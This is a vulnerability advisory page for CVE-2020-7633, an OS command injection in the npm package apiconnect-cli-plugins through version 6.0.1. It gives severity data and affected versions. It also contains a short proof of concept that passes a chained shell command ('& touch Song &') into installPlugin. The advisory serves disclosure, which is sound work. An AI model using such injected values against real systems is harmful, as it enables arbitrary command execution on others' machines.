Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWM5bTktNDhwdy02bXB2

apiconnect-cli-plugins vulnerable to OS Command Injection

apiconnect-cli-plugins through 6.0.1 is vulnerable to OS command injection: the pluginUri argument of installPlugin is passed into a shell command without sanitisation, allowing execution of arbitrary commands.

PoC

var root = require("apiconnect-cli-plugins");
var payload = "& touch Song &";
root.pluginLoader.installPlugin(payload, "");

The injection point is at line 181 of lib/plugin-loader.js, in the function installPlugin(pluginUri, registryUri).

Permalink: https://github.com/advisories/GHSA-c9m9-48pw-6mpv
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWM5bTktNDhwdy02bXB2
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: almost 3 years ago
Updated: 7 months ago
CVSS Score: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Identifiers: GHSA-c9m9-48pw-6mpv, CVE-2020-7633
References: (none listed)
Blast Radius: 0.0

Affected Packages

npm:apiconnect-cli-plugins
Dependent packages: 23
Dependent repositories: 1
Downloads: 177 last month
Affected Version Ranges: <= 6.0.1
No known fixed version
All affected versions: 1.0.1, 1.1.1, 2.0.0, 3.0.2, 3.1.0, 3.2.1, 3.3.1, 3.3.3, 3.3.4, 3.3.5, 3.3.6, 3.3.7, 3.3.9, 3.3.11, 3.3.12, 3.5.1, 5.0.1